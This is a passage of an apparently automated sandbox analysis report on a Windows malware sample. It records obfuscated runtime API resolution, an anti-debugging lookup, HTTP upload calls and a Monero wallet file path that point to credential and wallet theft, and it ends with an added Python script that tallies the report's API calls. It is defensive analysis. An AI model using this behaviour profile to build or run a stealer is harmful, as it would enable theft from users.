                                  • GetProcAddress.KERNEL32(75290000,011F25C0), ref: 00549B23
                                  • GetProcAddress.KERNEL32(75290000,011F2590), ref: 00549B3B
                                  • GetProcAddress.KERNEL32(75BD0000,011F2548), ref: 00549B5D
                                  • GetProcAddress.KERNEL32(75450000,011E5BF0), ref: 00549B7E
                                  • GetProcAddress.KERNEL32(76E90000,011F92C8), ref: 00549B9F
                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00549BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00549BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: aee99fc8a07a6783d27c1a9564423215e0987c09bc0d06f1c0caf470285277b7
                                  • Instruction ID: d797cf05844b653ae60a850a9e294924309070703860a8b8d046506365506ced
                                  • Opcode Fuzzy Hash: aee99fc8a07a6783d27c1a9564423215e0987c09bc0d06f1c0caf470285277b7
                                  • Instruction Fuzzy Hash: 77A159B5504240BFF349EFA8ED8995A3BF9F7D8281704C51AA60D83264D63D98C1CB9B

                                  Control-flow Graph: function 5345c0-5347a9 (rendered graph not captured)
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0053460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0053479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534678, 0053473F, 005346D8, 005345C7, 005346B7, 00534713, 00534770, 00534683, 00534638, 0053466D, 005346CD, 0053462D, 0053471E, 005345D2, 00534643, 00534657, 0053475A, 005345F3, 00534662, 005345DD, 005346AC, 0053477B, 00534729, 00534765, 00534622, 00534734, 005346C2, 0053474F, 005345E8, 00534617
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 39a7bafde9548289c54a4633b779626c4beed938dc37124d2040308489a64ccb
                                  • Instruction ID: b0cbda52da9daf5320190efa02cfcc1b14c2edb82877e66e01b8a1d8cff553f8
                                  • Opcode Fuzzy Hash: 39a7bafde9548289c54a4633b779626c4beed938dc37124d2040308489a64ccb
                                  • Instruction Fuzzy Hash: 2E4156247C1E04EFC624F7E5887EE9E7F616F5AF02F417889AD081A282DBF125055531

                                  Control-flow Graph: function 534880-534fa2 (rendered graph not captured)
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00534839
                                    • Part of subcall function 005347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00534849
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00534915
                                  • StrCmpCA.SHLWAPI(?,011FE878), ref: 0053493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00534ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00550DDB,00000000,?,?,00000000,?,",00000000,?,011FE768), ref: 00534DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00534E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00534E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00534E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00534EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00534EC5
                                  • HttpOpenRequestA.WININET(00000000,011FE7A8,?,011FE158,00000000,00000000,00400100,00000000), ref: 00534B15
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00534ECF
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 02aeab90b0f46dee60a9d4c14e697d50ede29a499e254185ed44bd736c73acf1
                                  • Instruction ID: 58c1ed88f4b535ab6c6d52d635157db1bc5530012b93cf3a4d308cfaab6f2220
                                  • Opcode Fuzzy Hash: 02aeab90b0f46dee60a9d4c14e697d50ede29a499e254185ed44bd736c73acf1
                                  • Instruction Fuzzy Hash: 02123272950119AAEB54EB50DC5AFEEBB38FF94308F504199B10672091EF302F49CF66
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005311B7), ref: 00547880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00547887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0054789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 2200d38b0731b7c971100a8de2d53783f3fe61c1387a83333bc655f2927edb56
                                  • Instruction ID: a81502826fccc1742817a1f2adc226143355e8c140feed4830626b73317bef0b
                                  • Opcode Fuzzy Hash: 2200d38b0731b7c971100a8de2d53783f3fe61c1387a83333bc655f2927edb56
                                  • Instruction Fuzzy Hash: 7FF0A4B1904208AFD700CF84DD49BAEBBB8F744711F104159F605A2680C77815448BE2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: the same 14 dump regions (00530000 through 00BBB000) listed under the Memory Dump Source of the preceding functions
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 8581f4d88b8e3239bae34b7a33cff23ca2f893d6b73cdc6642965545be295e62
                                  • Instruction ID: 6ecefd9fad1a1b7c3810203e2bec002cc9140d4f984730b5ba0337a25b9d0317
                                  • Opcode Fuzzy Hash: 8581f4d88b8e3239bae34b7a33cff23ca2f893d6b73cdc6642965545be295e62
                                  • Instruction Fuzzy Hash: 24D05E7490030CEBDB04DFE0D8496DDBB78FB48312F000554D90962340EA3054C2CAAA

                                   Control-flow Graph

                                   Basic blocks of the import resolver at 549c10, in address order (block id: address range, calls made in the block, module handle passed to GetProcAddress taken from the API list below → successor blocks). Each short test block skips the resolution batch that follows it. The executed / not-executed colouring of the rendered graph is not preserved in this listing.
                                   • 633: 549c10-549c1a → 634, 635
                                   • 635: 549c20-54a031, GetProcAddress * 43 (handle 74DD0000) → 634
                                   • 634: 54a036-54a0ca, LoadLibraryA * 8 → 636, 637
                                   • 637: 54a0cc-54a141, GetProcAddress * 5 (75290000) → 636
                                   • 636: 54a146-54a14d → 638, 639
                                   • 639: 54a153-54a211, GetProcAddress * 8 (73560000) → 638
                                   • 638: 54a216-54a21d → 640, 641
                                   • 640: 54a21f-54a293, GetProcAddress * 5 (752C0000) → 641
                                   • 641: 54a298-54a29f → 642, 643
                                   • 642: 54a2a5-54a332, GetProcAddress * 6 (74EC0000) → 643
                                   • 643: 54a337-54a33e → 644, 645
                                   • 644: 54a344-54a41a, GetProcAddress * 9 (75BD0000) → 645
                                   • 645: 54a41f-54a426 → 646, 647
                                   • 647: 54a428-54a49d, GetProcAddress * 5 (75A70000) → 646
                                   • 646: 54a4a2-54a4a9 → 648, 649
                                   • 649: 54a4ab-54a4d7, GetProcAddress * 2 (75450000) → 648
                                   • 648: 54a4dc-54a4e3 → 650, 651
                                   • 651: 54a4e5-54a510, GetProcAddress * 2 (75DA0000) → 650
                                   • 650: 54a515-54a51c → 652, 653
                                   • 653: 54a522-54a60d, GetProcAddress * 10 (6F070000, the handle from which the literal names InternetSetOptionA and HttpQueryInfoA are resolved) → 652
                                   • 652: 54a612-54a619 → 654, 655
                                   • 655: 54a61b-54a678, GetProcAddress * 4 (75AF0000) → 654
                                   • 654: 54a67d-54a684 → 656, 657
                                   • 656: 54a686-54a699, GetProcAddress (75D90000) → 657
                                   • 657: 54a69e-54a6a5 → 658, 659
                                   • 658: 54a6a7-54a703, GetProcAddress * 4 (6E170000) → 659
                                   • 659: 54a708-54a709 (exit)
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,011E5DB0), ref: 00549C2D
                                  • GetProcAddress.KERNEL32(74DD0000,011E5C90), ref: 00549C45
                                  • GetProcAddress.KERNEL32(74DD0000,011F9658), ref: 00549C5E
                                  • GetProcAddress.KERNEL32(74DD0000,011F9670), ref: 00549C76
                                  • GetProcAddress.KERNEL32(74DD0000,011F96A0), ref: 00549C8E
                                  • GetProcAddress.KERNEL32(74DD0000,011F9628), ref: 00549CA7
                                  • GetProcAddress.KERNEL32(74DD0000,011EB658), ref: 00549CBF
                                  • GetProcAddress.KERNEL32(74DD0000,011FD128), ref: 00549CD7
                                  • GetProcAddress.KERNEL32(74DD0000,011FD308), ref: 00549CF0
                                  • GetProcAddress.KERNEL32(74DD0000,011FD320), ref: 00549D08
                                  • GetProcAddress.KERNEL32(74DD0000,011FD218), ref: 00549D20
                                  • GetProcAddress.KERNEL32(74DD0000,011E5CF0), ref: 00549D39
                                  • GetProcAddress.KERNEL32(74DD0000,011E5D50), ref: 00549D51
                                  • GetProcAddress.KERNEL32(74DD0000,011E5D70), ref: 00549D69
                                  • GetProcAddress.KERNEL32(74DD0000,011E5DD0), ref: 00549D82
                                  • GetProcAddress.KERNEL32(74DD0000,011FD170), ref: 00549D9A
                                  • GetProcAddress.KERNEL32(74DD0000,011FD3E0), ref: 00549DB2
                                  • GetProcAddress.KERNEL32(74DD0000,011EB6D0), ref: 00549DCB
                                  • GetProcAddress.KERNEL32(74DD0000,011E5DF0), ref: 00549DE3
                                  • GetProcAddress.KERNEL32(74DD0000,011FD3B0), ref: 00549DFB
                                  • GetProcAddress.KERNEL32(74DD0000,011FD140), ref: 00549E14
                                  • GetProcAddress.KERNEL32(74DD0000,011FD188), ref: 00549E2C
                                  • GetProcAddress.KERNEL32(74DD0000,011FD110), ref: 00549E44
                                  • GetProcAddress.KERNEL32(74DD0000,011E5E10), ref: 00549E5D
                                  • GetProcAddress.KERNEL32(74DD0000,011FD290), ref: 00549E75
                                  • GetProcAddress.KERNEL32(74DD0000,011FD1A0), ref: 00549E8D
                                  • GetProcAddress.KERNEL32(74DD0000,011FD230), ref: 00549EA6
                                  • GetProcAddress.KERNEL32(74DD0000,011FD158), ref: 00549EBE
                                  • GetProcAddress.KERNEL32(74DD0000,011FD3C8), ref: 00549ED6
                                  • GetProcAddress.KERNEL32(74DD0000,011FD368), ref: 00549EEF
                                  • GetProcAddress.KERNEL32(74DD0000,011FD1B8), ref: 00549F07
                                  • GetProcAddress.KERNEL32(74DD0000,011FD1D0), ref: 00549F1F
                                  • GetProcAddress.KERNEL32(74DD0000,011FD278), ref: 00549F38
                                  • GetProcAddress.KERNEL32(74DD0000,011FA630), ref: 00549F50
                                  • GetProcAddress.KERNEL32(74DD0000,011FD200), ref: 00549F68
                                  • GetProcAddress.KERNEL32(74DD0000,011FD248), ref: 00549F81
                                  • GetProcAddress.KERNEL32(74DD0000,011E5AF0), ref: 00549F99
                                  • GetProcAddress.KERNEL32(74DD0000,011FD0F8), ref: 00549FB1
                                  • GetProcAddress.KERNEL32(74DD0000,011E5830), ref: 00549FCA
                                  • GetProcAddress.KERNEL32(74DD0000,011FD1E8), ref: 00549FE2
                                  • GetProcAddress.KERNEL32(74DD0000,011FD380), ref: 00549FFA
                                  • GetProcAddress.KERNEL32(74DD0000,011E5A50), ref: 0054A013
                                  • GetProcAddress.KERNEL32(74DD0000,011E5770), ref: 0054A02B
                                  • LoadLibraryA.KERNEL32(011FD260,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A03D
                                  • LoadLibraryA.KERNEL32(011FD2A8,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A04E
                                  • LoadLibraryA.KERNEL32(011FD398,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A060
                                  • LoadLibraryA.KERNEL32(011FD2C0,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A072
                                  • LoadLibraryA.KERNEL32(011FD2D8,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A083
                                  • LoadLibraryA.KERNEL32(011FD2F0,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A095
                                  • LoadLibraryA.KERNEL32(011FD338,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A0A7
                                  • LoadLibraryA.KERNEL32(011FD350,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A0B8
                                  • GetProcAddress.KERNEL32(75290000,011E5970), ref: 0054A0DA
                                  • GetProcAddress.KERNEL32(75290000,011FD530), ref: 0054A0F2
                                  • GetProcAddress.KERNEL32(75290000,011F91A8), ref: 0054A10A
                                  • GetProcAddress.KERNEL32(75290000,011FD578), ref: 0054A123
                                  • GetProcAddress.KERNEL32(75290000,011E56D0), ref: 0054A13B
                                  • GetProcAddress.KERNEL32(73560000,011EB9C8), ref: 0054A160
                                  • GetProcAddress.KERNEL32(73560000,011E58D0), ref: 0054A179
                                  • GetProcAddress.KERNEL32(73560000,011EB630), ref: 0054A191
                                  • GetProcAddress.KERNEL32(73560000,011FD548), ref: 0054A1A9
                                  • GetProcAddress.KERNEL32(73560000,011FD4D0), ref: 0054A1C2
                                  • GetProcAddress.KERNEL32(73560000,011E5890), ref: 0054A1DA
                                  • GetProcAddress.KERNEL32(73560000,011E5A30), ref: 0054A1F2
                                  • GetProcAddress.KERNEL32(73560000,011FD458), ref: 0054A20B
                                  • GetProcAddress.KERNEL32(752C0000,011E5810), ref: 0054A22C
                                  • GetProcAddress.KERNEL32(752C0000,011E56B0), ref: 0054A244
                                  • GetProcAddress.KERNEL32(752C0000,011FD560), ref: 0054A25D
                                  • GetProcAddress.KERNEL32(752C0000,011FD590), ref: 0054A275
                                  • GetProcAddress.KERNEL32(752C0000,011E58B0), ref: 0054A28D
                                  • GetProcAddress.KERNEL32(74EC0000,011EB680), ref: 0054A2B3
                                  • GetProcAddress.KERNEL32(74EC0000,011EB8B0), ref: 0054A2CB
                                  • GetProcAddress.KERNEL32(74EC0000,011FD5A8), ref: 0054A2E3
                                  • GetProcAddress.KERNEL32(74EC0000,011E57F0), ref: 0054A2FC
                                  • GetProcAddress.KERNEL32(74EC0000,011E5A10), ref: 0054A314
                                  • GetProcAddress.KERNEL32(74EC0000,011EB6F8), ref: 0054A32C
                                  • GetProcAddress.KERNEL32(75BD0000,011FD4A0), ref: 0054A352
                                  • GetProcAddress.KERNEL32(75BD0000,011E57B0), ref: 0054A36A
                                  • GetProcAddress.KERNEL32(75BD0000,011F9178), ref: 0054A382
                                  • GetProcAddress.KERNEL32(75BD0000,011FD470), ref: 0054A39B
                                  • GetProcAddress.KERNEL32(75BD0000,011FD4E8), ref: 0054A3B3
                                  • GetProcAddress.KERNEL32(75BD0000,011E5730), ref: 0054A3CB
                                  • GetProcAddress.KERNEL32(75BD0000,011E5A70), ref: 0054A3E4
                                  • GetProcAddress.KERNEL32(75BD0000,011FD4B8), ref: 0054A3FC
                                  • GetProcAddress.KERNEL32(75BD0000,011FD428), ref: 0054A414
                                  • GetProcAddress.KERNEL32(75A70000,011E59B0), ref: 0054A436
                                  • GetProcAddress.KERNEL32(75A70000,011FD500), ref: 0054A44E
                                  • GetProcAddress.KERNEL32(75A70000,011FD410), ref: 0054A466
                                  • GetProcAddress.KERNEL32(75A70000,011FD3F8), ref: 0054A47F
                                  • GetProcAddress.KERNEL32(75A70000,011FD440), ref: 0054A497
                                  • GetProcAddress.KERNEL32(75450000,011E59F0), ref: 0054A4B8
                                  • GetProcAddress.KERNEL32(75450000,011E5850), ref: 0054A4D1
                                  • GetProcAddress.KERNEL32(75DA0000,011E56F0), ref: 0054A4F2
                                  • GetProcAddress.KERNEL32(75DA0000,011FD518), ref: 0054A50A
                                  • GetProcAddress.KERNEL32(6F070000,011E5A90), ref: 0054A530
                                  • GetProcAddress.KERNEL32(6F070000,011E5750), ref: 0054A548
                                  • GetProcAddress.KERNEL32(6F070000,011E5870), ref: 0054A560
                                  • GetProcAddress.KERNEL32(6F070000,011FD488), ref: 0054A579
                                  • GetProcAddress.KERNEL32(6F070000,011E5710), ref: 0054A591
                                  • GetProcAddress.KERNEL32(6F070000,011E58F0), ref: 0054A5A9
                                  • GetProcAddress.KERNEL32(6F070000,011E5790), ref: 0054A5C2
                                  • GetProcAddress.KERNEL32(6F070000,011E5910), ref: 0054A5DA
                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0054A5F1
                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0054A607
                                  • GetProcAddress.KERNEL32(75AF0000,011FCF60), ref: 0054A629
                                  • GetProcAddress.KERNEL32(75AF0000,011F9238), ref: 0054A641
                                  • GetProcAddress.KERNEL32(75AF0000,011FCE58), ref: 0054A659
                                  • GetProcAddress.KERNEL32(75AF0000,011FD098), ref: 0054A672
                                  • GetProcAddress.KERNEL32(75D90000,011E5990), ref: 0054A693
                                  • GetProcAddress.KERNEL32(6E170000,011FCE70), ref: 0054A6B4
                                  • GetProcAddress.KERNEL32(6E170000,011E57D0), ref: 0054A6CD
                                  • GetProcAddress.KERNEL32(6E170000,011FCF30), ref: 0054A6E5
                                  • GetProcAddress.KERNEL32(6E170000,011FD038), ref: 0054A6FD
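The list above records 104 GetProcAddress calls against 13 module handles plus 8 LoadLibraryA calls. For all but two of them (InternetSetOptionA and HttpQueryInfoA, both from handle 6F070000) the name argument is printed as an address in the 011Exxxx/011Fxxxx range, outside the dumped 00530000 image, rather than as a string, which is consistent with API names that are materialised in memory at runtime; the report does not show the resolved names. The script below is an added example, not part of this report and not code from the sample: it parses API lines in this page's layout, groups resolutions per module handle and separates literal names from pointer arguments. SAMPLE_LINES is a constructed subset of the lines above; the line layout it expects and the upper bound it uses for the image are assumptions stated in the code.

```python
"""Group the dynamic import resolution recorded in the report by module handle.

Added example for this report; not Joe Sandbox code and not code from the
analysed sample. SAMPLE_LINES is a constructed subset of the API lines shown
for the function at 549c10, and the 'Name.MODULE(args), ref: ADDR' layout it
parses is assumed from this page.
"""
import re
from collections import Counter, defaultdict

SAMPLE_LINES = """
GetProcAddress.KERNEL32(74DD0000,011E5DB0), ref: 00549C2D
GetProcAddress.KERNEL32(74DD0000,011E5C90), ref: 00549C45
LoadLibraryA.KERNEL32(011FD260,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A03D
LoadLibraryA.KERNEL32(011FD2A8,?,00545CA3,00550AEB,?,?,?,?,?,?,?,?,?,?,00550AEA,00550AE3), ref: 0054A04E
GetProcAddress.KERNEL32(6F070000,011E5A90), ref: 0054A530
GetProcAddress.KERNEL32(6F070000,011E5750), ref: 0054A548
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0054A5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0054A607
GetProcAddress.KERNEL32(75D90000,011E5990), ref: 0054A693
"""

CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Address window of the dumped image: base 00530000 from the Source File line;
# the upper bound is an assumption (one page past the highest Associated region).
IMAGE_BASE = 0x00530000
IMAGE_LIMIT = 0x00BBB000 + 0x1000


def parse_calls(text):
    """Turn report API lines into dicts; lines that do not match the layout are skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = CALL_RE.match(line)
        if not m:
            continue
        calls.append({
            "api": m["api"],
            "dll": m["dll"],
            "args": m["args"].split(","),
            "ref": int(m["ref"], 16),
        })
    return calls


def classify_name_arg(arg):
    """How the report rendered the lpProcName argument of GetProcAddress.

    'literal'  : the tool could read the name string (e.g. InternetSetOptionA)
    'in-image' : a 32-bit address inside the dumped image window
    'external' : a 32-bit address outside it (heap or another mapping)
    """
    if not HEX32_RE.match(arg):
        return "literal"
    value = int(arg, 16)
    return "in-image" if IMAGE_BASE <= value < IMAGE_LIMIT else "external"


def summarize(text):
    """Per-module resolution counts, name-argument kinds, literal names, LoadLibraryA count."""
    per_module = Counter()
    name_kinds = Counter()
    literal_names = defaultdict(list)
    loads = 0
    for call in parse_calls(text):
        if call["api"] == "GetProcAddress":
            module, name = call["args"][0], call["args"][1]
            per_module[module] += 1
            kind = classify_name_arg(name)
            name_kinds[kind] += 1
            if kind == "literal":
                literal_names[module].append(name)
        elif call["api"] == "LoadLibraryA":
            loads += 1
    return {
        "per_module": dict(per_module),
        "name_kinds": dict(name_kinds),
        "literal_names": dict(literal_names),
        "loadlibrary_calls": loads,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Run it over the full API list copied from the page to get the per-handle footprint of the resolver; a handle whose resolutions include a literal name (here 6F070000) is the one whose module identity the report itself confirms.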
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: the same 14 dump regions (00530000 through 00BBB000) listed under the Memory Dump Source of the preceding functions
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
